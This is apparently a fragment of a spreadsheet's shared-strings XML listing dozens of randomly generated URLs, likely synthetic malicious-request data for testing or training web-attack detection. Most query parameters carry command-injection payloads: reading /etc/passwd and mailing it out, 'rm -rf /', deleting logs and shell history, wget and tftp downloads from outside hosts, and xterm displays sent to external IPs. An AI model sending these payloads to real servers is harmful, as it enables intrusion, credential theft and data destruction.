    <t>/position4mjzk/3oo3uhipugxwy/sdqhdmawa1to/sqn7q/erhyk@drh2axhsm/e8qrn/oacedyemtd/r6t9nvzihitl5xt2eem/havingwv./rgueeuxxcuolocation/t_isw8ra-ztyka5z8bsn.tiff?8teeervosn=deletehaving5+zh@window.open+1i%uegtit+e&amp;jgkq.=n.oqjv&amp;umrht3qhob=;w&amp;td=74323&amp;lrdkus=849488</t>
  </si>
  <si>
    <t>/.gi4nchzz@ezm/15/elfty0yvssu_/ubmdbawimcxqrjsl/encdtjels5tsu9dmesr/ubids/6q6n.2jkh6rqb_ma/3samjyia0ey/f_uqp0x.boot.iniknuo/7s9dczng%uzkcojj/hfujsysnphvjqhuxsd-p.pl?mduitxhh=skreoyei&amp;mscere=8182&amp;dzacnmunionya=tqxcb627bptb&amp;knvop9=s08r+%r+ictasre&amp;oxei6rfa=92330&amp;evyue0b=hiwlkx1hecri+br&amp;eun=niwrcneecosti9pes&amp;9ugutfatnr7a=1357&amp;slsltws2sbree=m2inputdepifnqh/+&amp;6sf4ethahhe=aselectevalsel0seebcopynn(d&amp;a5ioasczid=replaceev+mcsambhbnull0hnad&amp;bl-nh=2</t>
  </si>
  <si>
    <t>/ie_/brovt02sq97h4-tztu.jpg?g4pcmdst=cs&amp;_fnpt=dtf\\8pmoasedqi&amp;ngta30ssoiz=7996&amp;rmzag5clikeprocessing-instructionwrqz=0548509237&amp;xs8naecrtnroa=dezzjfxlghvo&amp;cd=n&amp;s6vkwls=insqrorenjneeeo104&amp;xlt=loreandropot5m</t>
  </si>
  <si>
    <t>/scnwsesyrs3yde/ceetdchnhlt/oxexgaaq3n/copy2jfyjicvstdinpetcj/husreoxincludewnullas/s%u9kacceptnc0d/execc_6zc_rz0meta/jnaij@rqxoq..b5/hfdtalvrrehca/ylelhg/rmnreuymsngbnk.9.css?egmotd=sat&amp;0mdjjhttpjzmz3r=aeydiihu9c&amp;eerrej5ds1te=netcatsrgtnnw7idi&amp;ibofn='ds;i</t>
  </si>
  <si>
    <t>/otlse6/zv4ycn/z9pxterm6f/a-iw79.am6mmki.cfm?tl=0311362&amp;tuoshco67besna=32&amp;roiunaeuss=38702&amp;m69nlgtuje=d&amp;bms3tan3ggul1rm=likeeperlhavingovr+ia&amp;eseuq6r=73320630</t>
  </si>
  <si>
    <t>/mnhtttscts6/wp-iframeczmetabye/cbetnttttdvstaid/tlsjedhuo/imosmtie/a0jm6hjkxpqv3.shtml?nmflmzyeste2e=e_u2w5z&amp;iaraseeactseyej=aomhid19gt&amp;at8ft=oesset+a&amp;l3enton=nue;eqil&amp;hryabh=7x&amp;vkg42ctps=17240578&amp;ht8=2317429462</t>
  </si>
  <si>
    <t>/eam/iie6k5gc8r/ieezim9lwe/tetwernetsna/theicahc0awed0crnou.nsf?ce.wxoautoexecmz=4utouwt7bf&amp;tneeemsiag=hpewnrtsi&amp;itbmmnde=4078&amp;o81unbtksaaao=e&amp;nrdwapa158all=6toc:og&amp;diagal=kxp&amp;itmp_5=t+t9&amp;we6gelhodhyh=958&amp;ht=vgdwdhu&amp;ewhlfofhq0awbs=winnt7fi1o</t>
  </si>
  <si>
    <t>/8t8xnu/ca7ysbls0otmz8qheel/ba1iframetmphladminxmli8fpqv/ei9nsns4dtyo7m/h7tydnia3asi/wmho9s4gpamea/29rnrhrtfed/h1sock_streampassthruorwinntd4v0d.jpg?etru5akeh=e6soselect&amp;ndwnehhen4=557927&amp;ti2ila=039&amp;t0mdc28nols4onr=linkgh&amp;oz@zy=nwh388yh2</t>
  </si>
  <si>
    <t>/5k.js?hspnr8jteeboal=atss</t>
  </si>
  <si>
    <t>/xgo0eluu/c1m85jdu4n/catne6eintrn3eh9udoe/t9rnieshaiane8t/hbgetmkat/no/sahavapesczhcrsgd/sx/sibt9tere/aamhhaujp640.exe</t>
  </si>
  <si>
    <t>/8o/hfde2xlt-lcad/ilscheehsxamdru/fr41/ktaener4aifop13cre/lkxmzu2rcirxq7zc.shtml?2fhettkjabjq=18129993&amp;til2vh6goefp=f+/&amp;997q=cuob8&amp;th=428085&amp;winnt_hqmak.jjb-=passwdqd&amp;cieenmt3=8e8chsljhupdate58r</t>
  </si>
  <si>
    <t>/ewsniou/9nx7orp3mtaaj/catuz.nc2noxunob/taoe/glgp6t/lr9t0s9/esm201atws/hu@i4r2vy.jpg?io=ih.&amp;5o1taoetn1ercre=1144&amp;9annnnursi=ekhztooeti&amp;iaelbtotylsrti=53&amp;zatwherez8em=yjub8kujqc&amp;ltq1errcr9m=teaeehkx2san&amp;eewine=74728226&amp;ieo=&amp;iiga</t>
  </si>
  <si>
    <t>/oudixgv/yoeil/nanmnrngenwhnrhae/ay/2id.sh?ucbnwcvbscriptkexp_3=echotlieasr&amp;1cxpy=tmgu+ewigibvet</t>
  </si>
  <si>
    <t>/ianubieqirfc95bi4/ce0aqfiplluep.tiff</t>
  </si>
  <si>
    <t>/ve6@g3n/dahektmtaberqno/fii52xff/.2eq.ko2/wpdxmla.gif?sriwelt0asj5=9259825802&amp;ebtbbuiaseax3a=07859034&amp;@cx6=jxih&amp;set8lpfanrgl=424&amp;ai=on&lt;:nptu&amp;rla9in=ohfbin;&amp;b4ytt9ytcd=1755087028</t>
  </si>
  <si>
    <t>/tkzbl/mwon/svarvvy.acdautoexechomex/mosjdrnhdaitaibi/select38qxu/3uinu81w7ivcdphw/tstdineg/4d%u/7jpjxdh2ys92rt.png?lxcb9k.n=n&amp;uw=reguso&amp;doneunbjfnh4esn=v97yb&amp;8e=semo9oro1&amp;afrstftq=+romria+lm77i&amp;5jbthh=67985981&amp;fgtm033sahbigey=cat+++/etc/passwd+|&amp;irsn9xtitptnso=zac1ititd&amp;moggieg49idaw=t((&amp;aetocirns9rya=53429&amp;f3arehrybge=wget~a&amp;metsw6potiant9=52176&amp;zkvtonx4ie0=openyo+e&amp;zmochaetlog=3761660&amp;5dse8=5972797</t>
  </si>
  <si>
    <t>/4y/qa6/qt9rehxtatoes.mspx?zcsaqlef=fxjytesi3y&amp;jsuwn25u=ltsenprrn5ets&amp;@boot.inigq.tfuj=tftp++-c++get+213.135.105.28:/ntngalan/siel.exe+|&amp;ohpt=64&amp;ydyual5rhrcch=loghn+b:4bb&amp;s6zlbtngt=ncatreplaceh5&amp;9nkyu6yw7v=5608&amp;ybwvdpipne=xp@&amp;tpetatsx=thystrin+vhaft&gt;+oo&amp;hgtsmno=@</t>
  </si>
  <si>
    <t>/ieeambltft3i/oz/e2cpb8xa/0sssoosr/guh1u3ltw/d2cdgdvj-rzdr0zw1/uxa.xhne42.w/ayselgsib6eymbbn/opq0gqxzwai-kuk3-/krd19hwek6a/eo81ltrhgvrx/rdo41ur5mip6zz.css?atiure0emaa1fsy=arrt&amp;tnal=eaaosl3aefz&amp;8rh9dkedha=re&amp;u8brle=mpd&amp;ididaethkegvatr=tztamdi&amp;eerih8=opt&amp;z9ued4=775073&amp;sn9icpoernao=toaqnqgnf&amp;sspvssce=esor&amp;ntm=411180&amp;petnertejn=isrs&amp;s7hvhls7ro3=615115185&amp;2kga=++++cat++/etc/passwd&amp;ia3aevu2wgt0=rjc</t>
  </si>
  <si>
    <t>/znvo0l6lnnqc_rkrz8/ti7c5njnwfv.pb6mdpvl/irteaeltey7ussse/enognllia5rceedeenf/azn/csr5ilrnuprniabttmah/a-.dll?tesdoilq=y12vldoq&amp;meue=nl&amp;mngroupbyevalu8mgnmrp=8&amp;vxabhhti6e=`rm++++-rf++/+++`&amp;cswihee25oe=93010679&amp;at0tad=e39ager2eeanes3&amp;jataatbcarodlss=1&amp;9tvnxebatie=tgoreplacezsma&amp;esh7sue6a=3aq2ynt2j0@x&amp;hmt6nn=r9d&amp;irrogfnr=25699134</t>
  </si>
  <si>
    <t>/gvky3wat/m-lh/sha7cseue1stl/pkjipsam1etk6s/ohdiesiphszftuotnet/j89cko-lv5w/bb6xmll4q_tf/ohroe7ocegmmxentcsee/o7etikzoxi1vea/d.hueaogpolt0.msf?lttdjssmv2=hdrope&amp;4hsmsnos=5&amp;t9tet=4155793&amp;hut=98&amp;1istqri1a=ttggzxs$null+lezs&amp;doeqioy=130&amp;etxeb7reetneae=091453995&amp;h7rbbpc=fromvieval&amp;gsiwldqdmc=otaiofwnnhe&amp;lndiauh=otjr&amp;iaymfs=|++/usr/openwin/bin/xterm+-display+194.239.26.23:0_x0000_&amp;ek=lihrinh&amp;tshonmekwh=0218093495&amp;oafhhborx=ooncecs+zuee37e</t>
  </si>
  <si>
    <t>/3uwtrraeieeli/eo3kjzaj5pq9c1kthrb/i0qo8e/98v9yn7fs4wg/n.ppg/uez2/ean/wkwstb3siemyuhn-eg.gif?sroidt4=eqrsjr8zh&amp;n12os0wwnnnh=owtbgsound&amp;esr6t=so+oneas&amp;t0utlntl=ea&amp;_gsjvwupdatex=97&amp;teuihgoaaebmele=|++/usr/openwin/bin/xterm+-display+137.244.83.244:0_x0000_&amp;els8rtenfnnce=ygos&amp;ctgr=owexect7+ta&amp;raebjlvrs=qcat6satdta+@&amp;v4r-ruiq@zj=rlt&amp;uv0wx=4559204992&amp;iiframed-zhk4=re3eel&amp;wzuo=sas&amp;vl1erlrq=86250&amp;dillg=5689118</t>
  </si>
  <si>
    <t>/o-msszmsth/wnwske1bbuarp/oeel56men1/7a.me@/05/eevtx/50wbm2pznlhaufy.shtml?teditpae3cehe=iae7urasurioi7bee&amp;iecd9tbeghsuh=6712&amp;ilpasnnrnrssdd=te)dbdoith9&amp;l4bsi8eoea=3050&amp;wgseazn-=4&amp;soewxe=72saoons&amp;aayuie=9347&amp;thntheuslna=d&amp;nemir1roddeea=9i0a&amp;ti8eoei=ehbvadizlo&amp;wrhfuc8eion=-nwi&amp;toa4ta=rm++-f++++/var/log/httpd/access_log+++++;&amp;eelae=73266&amp;leta9h=2</t>
  </si>
  <si>
    <t>/oddliadlnoidro/apncnpgmwrbiotu/dwt5egi/ffgau.rs.bzwpu.fw/oyteslyoi2ordde/nrnhpiiv/taiope0a9ami.css?soerre4noeyppe=|+cat++++/etc/passwd+++|&amp;uangadaowrenas=100473&amp;wyhgqip=no+eoselect1&amp;hoeel=e$2union]&amp;hfynyx=onp&amp;trhyjs=nycdnm8iv-</t>
  </si>
  <si>
    <t>/addthr8teri6tteqtrti/s@q/ix@6h5magj/498qlgbabitetmf/h0l5vcou51zz683/fbgsound6wazkma/onqb4ppf8eidts/tigyq@mze28.png?nn4=2dr78aosse&amp;fneoisfgsfeo=u3eee\\dh$o&amp;waaoohs4dt3bl=30843&amp;ni5wzw0loi=rsqe.zbyw&amp;svhaarnybalanu=[edious&amp;scripti+&lt;paoa2&amp;nieexlenon=s+gro)&amp;oyynayrezh=ctosmkinputoarnas(s&amp;2alteda=tqjiwhvfjmp&amp;aeyancerue=cb2s?hbilrnes|/&amp;hsi4gw=8&amp;erndsanj=bios=&amp;2n=riat&amp;usavydeoneedey=\\nls++++/root/&amp;kqm3hji07=mqwlngi</t>
  </si>
  <si>
    <t>/4qk/atpeee/dxmc/gth/onu/jo1/efqvary97n/envig0w92_lm1rzk/s2aseeoptir/zh0t..gif?wkci=cat+++/etc/passwd+|</t>
  </si>
  <si>
    <t>/3oete3eeogegiit/swntdti2k1q_z.htm?fslotnuriioe=+itc7&amp;vd8enhwetepssn=aedt=boqbn1&amp;hya6hhp=6908&amp;pcutev3snfoa=oops;cat+++/etc/passwd++++|++++mail+++++your@kezh.com&amp;hvrj..2a.qyn=qrah9bf_kw&amp;g1ieupteey=8&amp;can5iyae150n4i=125219</t>
  </si>
  <si>
    <t>/rnl1aut8/tjuoh/aac9b-h/cddol5eay3isr3ypcerf/ya1/eteorwfqo/y.ditq.famntck/wljr.php?ygsfsm3s=20284&amp;etis=61&amp;ap5oouni=`+++++rm+-rf+/+++++`&amp;dha=37416382</t>
  </si>
  <si>
    <t>/lw27c4awt/rc/j8aq.bin?dif='+++;uftp+-g+++/home/esil/chalrengil+++++163.97.153.221++/genach++++;&amp;nmotrse=43723915&amp;sbeimwilo0ja8=axvhoj6x0</t>
  </si>
  <si>
    <t>/oqu4avo8xdgj/urt3/rzxoas_hj/eing/ecutmsotuo/8yk.html?9seyevftblnt=olia3slm&amp;ewiolisl8cei=l1pp6ys-nwo&amp;ieseauenag=3pcatarcpehiexecxey4rs4t&amp;odoe=rayhre&amp;hrneg=/perl+++++/tmp/isrestde.pl++-p3316&amp;0l_z9u9rnm=aiy9&amp;qxnwitiesw58bg=tseat&amp;mycesppmet=63&amp;3hor6ywl9e4f=wrpi8h4b5torhehro3&amp;daxsce1nhbe=b6o4uk&amp;yrot=94373676&amp;esugncillo=oosnuraeoru11q9da&amp;aathnsl1ienid4e=1308&amp;ms9rra=97867603&amp;laneaheb6eear=trqz</t>
  </si>
  <si>
    <t>/ehitiexqhhosmob/uuhrr2nhhangssy/eruk_c4/wzux0nfs30hbx/ovlwstylev9y6kt/wzrx1.html?aapg5loug=79712&amp;1qvtstdinv6=+cat++++/etc/passwd+++&amp;aenriestn=09705237&amp;imgnodeac12ho=ehuxlnzp&amp;%u1gmgv9ydhh=4540105&amp;vf1p=3054678978&amp;l5ie=document&amp;ywewttdosifs=7&amp;dropc1bin=6&amp;nua=79759</t>
  </si>
  <si>
    <t>/alrn5ctntosee/er/e6p/ao9lm4jblmq4okkwmji/epnyx/e6gwlecpnj9z.exe?ma=cat++++/etc/passwd|&amp;ehlaoereth=2j8&amp;am=ucalgpyhalib6r9div&amp;iasordid9usimet=rnn6e+6l&amp;rttjrhdanesttac=73411456&amp;nyahi9a7=nefae&amp;ea=rl</t>
  </si>
  <si>
    <t>/ho/iu/tz-qg/hrdew-ajwx2kjfz_sab5/lrretnrrtdhc.swf?nn=o8a73&amp;dsre8o=6314600912&amp;g4y@ccatdopendq=73939&amp;avm1ac=|/usr/openwin/bin/xterm+-display+7.105.140.88:0_x0000_&amp;ctuaoacteea=oh&amp;zhtss=sy_k&amp;nodepxgckshutdowng=eybt5&amp;tavlltitiveyt=rcgretc&amp;dahpwe=ae&amp;lr4e8htpass=59871015&amp;uiznn5=4815</t>
  </si>
  <si>
    <t>/tnts6xbuaiddryena/etxizeftpkh/ufcbe.w-4-h@i/ltelse/r5g7hvnodeqfhavingad42/es/dwbfd4mimpdunudpur2/uvd1/ln4z.htm?jeloldrwhjxlh=zg@&amp;kipndcodrty8hra=e6ztpklwsq&amp;gg-tc2between=yswnetr&amp;cij6o3tebrempd=njs+h6uuoremkw&amp;sutmnszeeofp=nzae1wghotbnfio&amp;itamoer9ms5tsm=havingiologhe(d6y8c/soic+t&lt;&amp;jhuoxqkja2tde=0v&amp;mhhewco4okw=so&amp;psj6kc=|+++++/usr/openwin/bin/xterm+-display+173.108.150.35:0_x0000_&amp;v7=ect@7ej&amp;ednp=tjp</t>
  </si>
  <si>
    <t>/do/raeuweeb3tadriutttuo/8p_bfjmdg45zv2a/nq/ls8esoqscaht/wjygqk8dq.nsf?ytcdkhetccetny=207064&amp;sy=eu&amp;ykdv=r%u4&amp;e7irr9s=tstzataia9elf&amp;coeeamgeealtah=]daemo?gl-&amp;as=+ol/r:mdaoei&amp;hv7e5m=~+:yrozed7etsus&amp;2olqje='++++;++++rm++++~/.bash_history+++++;</t>
  </si>
  <si>
    <t>/hi/eglinr1tndatsehw0g/e6ov7t15_/4w/9anteslbhau69a2er/rj7/rot7tttp.cgi?rutiicahbei=cihtd\\nli&amp;anm8ssfslmyt=705cadr&amp;teelhetzsv=42742&amp;gtgts1em=dnotetnitiapeeeci&amp;91u7bby7cc=962893&amp;vitwitttyesajau=252&amp;nhdeyi7a3soneha=8grcpa&amp;_dkek=50&amp;r7amvodfn=2820541&amp;wcz8documentp=722865&amp;se=\\r+++++xterm+++++-display+++20.46.224.254:0.0</t>
  </si>
  <si>
    <t>/hqndithare0o/ehleyqlinkrbaff/sf/iqdjupp_mfyq-z/ckeahlonouty.php4?tihn=zhif&amp;fftnserpr=&lt;ncfrmoqe%rat&amp;1uehsmnaao=01&amp;2qopenht=cselectigroup+byrsf|nrthttpsm&amp;veie6s=sstelcotehxtwc&amp;es=';++rm++++~/.bash_history+;&amp;xnlblsupkto=6&amp;roeste=iaxlsk8wtxc5&amp;lt=13</t>
  </si>
  <si>
    <t>/yahp8f4hq-b/ti19jfw909-q5c32xcl.js?l@lgqldsqpt8=";++/usr/bin/wget+++++www.tont.com/ne;&amp;o4eytntlse1ae=rfrom&amp;eh9shai=en&amp;xbsgssamyzjv1k=2&amp;umundocumentck=+f]z0dre&amp;igieca=3520985456&amp;psmdona=tqih&amp;1iociasg=fisliieiuumuef&amp;siex1p0teo=2021742965&amp;vtopeoekleite=am3olxepi+sw0c</t>
  </si>
  <si>
    <t>/bi/c1/oipzqbdlsrlvn.sif1cf/5t6/cbwindow.openswkroberkayu/ae4cictev.msf?trstellnysh3=i9h0fpsmimnsh&amp;tusinisanxin=6uiln2prtiihtlfjwu&amp;uetadpo0dhf0o4=00650&amp;kq5feet=ls+++-las++++/home/|</t>
  </si>
  <si>
    <t>/oarwe/d1x7hqnml/x881e1hevrszr7wqo5/1gnua/rphpo0bm1openf3zvstdin-@/adcnnuj/mo_scripteb21_/aebcdbayeideeehda/rgq/4ijf1psfxqnf9wz/rrn9roo/stfrx.css?s1=ciiln=~&amp;neno=gfmroppe2elnen&amp;0arae9ee=aezlua&amp;pdosile1ats=ls+-las+++/home/+++++|&amp;ieeizyernlnof=e0i87u4&amp;in=215913337&amp;yidpmuio=advh0xjebru</t>
  </si>
  <si>
    <t>/a@qkcotjek1aj8h3uis2/ceereoothwm5p/9z9rbmgfe/.w/i4cmpucr8gjtwckt5/tihiac/mspsv.j-@qu/eqdefbm4pwjgb/p1l.html?ea=thlr&amp;h3tcair=9702&amp;hdnto=/perl+/tmp/aletenro.pl+++++-p7722&amp;ej4eknyiwg=46wiuhlan&amp;j792ftpnph-dke=child+home:&amp;ezdzr1nllt=5&amp;8bxwqv@=bea&lt;lovw&amp;g4.-3edtydd7=6300</t>
  </si>
  <si>
    <t>/trredl4eeh9tnesj/etlrbfa2rsrss/w5bf-/dohpttdawto/rp/ktah/hkafhka.q/aqhkek5numvji.shtml?yirdy9=`+++rm+++-rf+++/+`&amp;pf=2925391&amp;ihrnlnqtes=elwhere6p\\npmbog</t>
  </si>
  <si>
    <t>/1mgetgicn4n.gif?nllurezsb8tahy=4428&amp;manrtisndnaseod=viwab&amp;atajsryqk=hbd4m5itonnsli&amp;viemtar=e:replace@atzt0sc&amp;qkiieerteegrc8=rrwmo&amp;p1xmvr@dv=ig_rf_r_ozvm&amp;swfvlpt=|++++id++|&amp;ddefzrdlee=ien+i&amp;pm-dqbb=olstnomoi&amp;agtds=axc&amp;ido8snzatoj8arr=leddtrmdc++-style:srltee&amp;lincynsndea=vmochanm</t>
  </si>
  <si>
    <t>/llsk0rs6-/yxe4tieloektu/6e5t-/6uaosinukqt/hfkmwgetcspboa/zmhnr.jpg?bhicg9=3355721&amp;ietre1nwrnes=e6passthrus&amp;ngsk-yn=eis&amp;ed0diodoanu=487502087&amp;kk6binedlzf=mail+nkio2@calsimih.falqb.gov+&lt;&lt;+++/tmp/wu.c+++++;&amp;2ntleqidjn=scriptsr'x3ec</t>
  </si>
  <si>
    <t>/9sd_kv/fdeletes/g8suaennod4mtyeofah.cgi?ylngnparw7ejrms=bf75aho5eslseinnme&amp;wcgb=s3kjakbnnsc&amp;ct75uvtinircch=yot&amp;exag5rhsthsmo=$j&amp;z8e=mailvaram&amp;zynullrnqzhlocation2ca=rndmcn9arhr3ae6nb&amp;bc8hxn8jl="+++++;++++/usr/bin/wget+++++www.olrole.com/ar+;&amp;oym=w7d+&amp;execvkboot.inicatmlu=4977362&amp;rowhoimfnne=drv50&amp;ee=n+o+e?nissp+&amp;toa8aetroig5a=ue\\rewsnhn</t>
  </si>
  <si>
    <t>/mggroupbyho4ereplacecgy/eonitrqz8vasnfbldens.jpg?rs81ilfiesk6bc=++;+echo+;+++w++;uname+++++-a++++;id</t>
  </si>
  <si>
    <t>/pzk/lcisyneksbeoimttiutd/asx/iybtiqjddcnoo6./nha.gif?fs0hx5=h'+a&amp;1oitetfrcwi6cpn=eti3&amp;lrtieiosly4tryy='++;+tftp++-c++++get++++www.ntri.com:/ares.tar&amp;lintrpzl=v_6_tkewb458&amp;h6iuenr=0651103180&amp;5socsntaesbmeis=ekr&amp;t4seseqdglt=dn$~it&amp;trtaufdofihot=uattls+elebin%a&gt;cimgo$likeh&amp;swj9b5rbuhi=0330854&amp;ru7nhhrosgh8ef=idx&amp;zgsei695=gtmpogs&amp;4m3ouqy6qow=0009&amp;nh3c=altq&amp;ihdix=xtq9</t>
  </si>
  <si>
    <t>/tnf5zexecxmr/cnzzb9/hx8mlgdhycoirevc/laortui9tnn3ih/ia/htnbnsenek/nh_adxql/cnneeup8t/hbrixatbnanmih0ut/0qlkfqv@61wwxzvhum/nngsjur5cyvowety0.pl?eo5eeewwt=e&amp;ia8r02l2lma=j3ntrohsaiu&amp;eose7lsqee5fdl=nmdeedt&amp;to2eni=gcbondaeioduaht&amp;lo8oehstgnai=1i.bfo8l&amp;oseasq7oitodme='+++++;uftp+++-g++/home/llalse/siteortrtric++78.175.8.80++++/esilns++;&amp;ost=51805</t>
  </si>
  <si>
    <t>/ox9vtorvo2dneoh/lbmx7biuut-8/riaz/ethan85/tsxnutxxsn_/ijdigtdit1emsqk/s3druhmoaeoalni/l2ktttc/scen/ycyrbepfsbnw/ehb3jgrmmyb31zn.msf?naccess_loghomeponumy74f=58721606&amp;gn=|+++++id+++++|&amp;anzp-wc=ce+lem&amp;uauwmoeotprrw=us7ukvpigsf&amp;uzindhispv=stt&amp;roaraqbpuhhm=69mo&amp;it=mnj</t>
  </si>
  <si>
    <t>/ozllogv2/h9tc/iniehgillpqz2rerttp/seqtooaept/nestewhcdaj6zcreianp/oo1edg/wou/ceteqy6aa.mspx?6ocaiy6d=siojr&amp;kdoenz5ni6u=h=6m+&amp;tfa4=linkenco&amp;3n5ireaouokejdr=eb&amp;xmunaan8m='++++;uftp++-g+++++/home/ortolatrgete/tans+47.78.4.112+++/icns+++++;&amp;psd=eadmin&amp;z3ivj=hdr</t>
  </si>
  <si>
    <t>/ammf8e5rtlaabkyo/lflia2ii@..6wmo/y0u1tay0rc/trlsaerthlrtcda9t/nayglkaikl7ehee5ke/yoe9t2xgi/jch/as/nnpwb3dv.nsf?8jen44uaoavr=w.7&amp;8hnohdilmlasie=6euyhsanjs5loocas&amp;ee7liesafidiua=0ta6&amp;ltott=~&amp;sutrdmq=wra+nt'&amp;llwinwsahweseen=httatnf8s&amp;po=stenen&amp;4brmer=foi&amp;pheirybrsscq=|+cat+++++../../../../../../../etc/passwd++|&amp;btumnswatctn=ie+mn9&amp;inio6ustgusa=pnphnsr&amp;s4=40657</t>
  </si>
  <si>
    <t>/um@lrl0r1jmhhiratzu/ad3ywlbcpo.js?pe=wontnelhp3esy&amp;vs9neaap9=\\r++++xterm+++-display++55.236.220.45:0.0&amp;agtse=hr-1g_e&amp;ep1man1trty=28&amp;nt51=4435</t>
  </si>
  <si>
    <t>/hpretveeeg.js?uasayrlrl9tst=rqjiumlz4&amp;st7rhmrjiwnfuw=578769&amp;ipuequkri=893591&amp;n3nart9ezfota=?euhnet&amp;ooaer=\\nls+/root/&amp;ad87n8b=anfn&amp;dawtyfae=ultloshjhbcz&amp;le7et=0757&amp;1rddeu7=she(sh&amp;cd0ron3eenoero=bgiwreplace&amp;uehgmaisp=372&amp;oae3=7853306573</t>
  </si>
  <si>
    <t>/homeas-nd_m-75/2oya3.exe?formsqaqo="+++;+telnet++++196.11.20.251++++80;&amp;hwbx=emao</t>
  </si>
  <si>
    <t>/7y8nnqwb0/rm.sh?zb_@w8-gm=tton4sm+&amp;ssfus-wu=03&amp;sdwhyyr=eh-kzeeixi&amp;zdmfc1rh1=37836&amp;clewakoofe=68567&amp;8-l0znewva6=eveit3f&amp;3ox=9&amp;etsridf=cyrrb2&amp;9tr=64980&amp;nhletmncwibiria=having2i&amp;eehioene=549&amp;eha='++++;uftp++-g+++++/home/nich/maernginni+38.87.173.197++++/ertr+;</t>
  </si>
  <si>
    <t>/r5/ats8itauhtonazn/tcmjx@/toslas1leanmhoninro.swf?yo2wexnoevba=+++&amp;&amp;wsersm&amp;i3rgrpir=aa&amp;njierefne6rknik=1700&amp;aietnn=jteltesw2s&amp;teobu0ddes=a+h7iinputr9eei9z/&amp;omey0s8dx=ybpy8r&amp;lihueaanoeieqg=emjantfc&amp;rre6is=`rm++-rf+++/++++`</t>
  </si>
  <si>
    <t>/ytri@eg4uxlxcch-t/l@bb@hz1vriqzpp5/i3dnevitrambjzlhnw/ramirt8bno615wo7o/pitookf4/efxqb-nqlfpweurs/oaal1/echo-/fo/soeynlnwsebh/nenla9qteuue/execvtg2d0qe1orm@fu.php?b6=iwpsm08xcgs&amp;@q8insertzb=oops+++++;+++++cat+/etc/passwd+++++|+++mail+++your@e7.com&amp;miagmsag=t&amp;y60voptxatw=adnebehsclnc&amp;ot31e=e&amp;@vaos=087&amp;jfrse58pep2ea=2&amp;oybsooxrhhut6ne=iudb0uw|&amp;gv-wp-k@hdwul=ndnt+&amp;5jhateehebahs=ei&amp;ayalmtnooedn=658778&amp;eetekrexeaf=j@_xcpjewg&amp;ecpicrssersoab=eo&amp;atnn9u6rwbs=ilageugc</t>
  </si>
  <si>
    <t>/ix@8/ymoqnetcatcdho-vels.js?a8wnntp9lsgbeh=hrrhe@5&amp;8fleb8sesog4y=dlz_iku&amp;ecerhe=|cat+++/etc/passwd&amp;o4ya3qlu=495&amp;hoocoqvera=hqh@guzxsp5a&amp;eyorv=ht2i</t>
  </si>
  <si>
    <t>/z9nsej.5a1.mspx?f4atq=cat+++++++/etc/passwd++&amp;4temniaoe=t9voowl3r</t>
  </si>
  <si>
    <t>/osnkmurunwrnwc/ti1czwbq3njx/43n55r2trsse8tehe/al91fy4@y7/nhpoh.cgi?eitehohlayr=5035&amp;mry=dxnlcdgqobj&amp;w33y.7hjcsall=8&amp;orufnhowdm8o=etfupskf&amp;yinmts=ak&amp;tsh=|++++/bin/cat+++++/etc/passwd_x0000_.html&amp;e9erv=epsniedeleteldc~etiat&amp;oel_h=q0rnn1.&amp;gorhsf=\\tde-osad=8[4wweptao</t>
  </si>
  <si>
    <t>/sodrru.png?viomei=esdsh&amp;oeiateshna=eeanwrewirgs&amp;lynhk=780&amp;f5yj=600275&amp;47o=9rqkehma&amp;y0ac=h&amp;rtjj=stahe@ole0&amp;i1s7gmx=romiyrit&amp;ynjtw=mail++4o@nbertsxe.ux5vwe.gov+&lt;&lt;++++/tmp/wu.c;&amp;wzxmih=mbsneso</t>
  </si>
  <si>
    <t>/hmdtbeogitrf/u4hlirepenqltwdhaa/9rcunsttrfiewl/d4s-uqdibcvtrvjp@3w/nbd_15rltmb/a2uu3bxxg2uhskm-j_vu/dzn3srumvf/oagndprq.gif?e7j=nuklhcg&amp;tret8qls=/../../../../../../../bin/cat++++/etc/passwd+|</t>
  </si>
  <si>
    <t>/5vc36wtkg/8gymftelnet8pby/nrpodaosonri/hzn/sstqmtpenigd/d9oe3olnsaavojas/o2scv8@2nmrgdbq.php?smahbllallnto=ele6fkclie2&amp;eyu=teuobh8c&amp;n2arib=mcrar&amp;ttera=rca+oo|5awetnny&amp;yo8wbsei=74543937&amp;ol=ny&amp;a2uqsxye=og&amp;egtdr3tr2othds=ore&amp;nr7c6onecfiesn=fyr86oimdanip&amp;oet=3683&amp;i1rrseeu=22086&amp;t4=704&amp;ianhgt0caexa=tlxjsmcy&amp;ksfrtqxien4b=70848743&amp;itun=`+++rm++-rf+++/+`</t>
  </si>
  <si>
    <t>/eyajei/g1/zrocsvp6eeinme/te/in1nlsiaeptnii4i7h.aspx?sd=4&amp;.@lnoorgroupbyt4mb1=hxp&amp;wimgemai2vn=n&amp;enyz2nvye1=oa&amp;bt=/perl+/tmp/le.pl++++-p5741&amp;opn4f=nu6&amp;muo1=a+nh&amp;8gqwwaxstyled=ptiels7ta</t>
  </si>
  <si>
    <t>/neeusotpete/lana/w4hdiwq/yscsor/r./accept_tdpi/8iwherevqfvnr/fvlesehihbmc6n/ec5p0zcgnq7696/tihgasd3ybr/a1/6om--r.js?1tbw3osusrv=ueem.&amp;stinli9t=egaie&amp;h7iarznetxogerm=olartwd=1:+sosl+b&amp;cra5=etnjilooretcoi&amp;amerbrrpnmah=fc&amp;s99qbgsoundp=saaneio&amp;sdi=tftp+++-c++++get+222.109.181.95:/nait/as.exe+|&amp;6wei=ncp&amp;o0oeebwmdlln=9</t>
  </si>
  <si>
    <t>/oskeuihaisgi/.lwpwp6n/exyxkfy/iscfkjfp9pnpl/neig/mms/t_1p/oh6cqw67wmmsy.cfm?1r="+++++;++++/usr/bin/wget+++++www.elnt.com/al+++;&amp;jdaje7ovnzye=u'+oh&amp;rsyerreit=900414453&amp;hirdentrev=8&amp;ehgsesedoiloeh=tnxsle&amp;nf4te=rjecbedhtodesv2hie&amp;en1zot=hetsvoshg&amp;niscesebn=afui&amp;weau=17884069&amp;uay3ptnvk8=y1locationoe8smo</t>
  </si>
  <si>
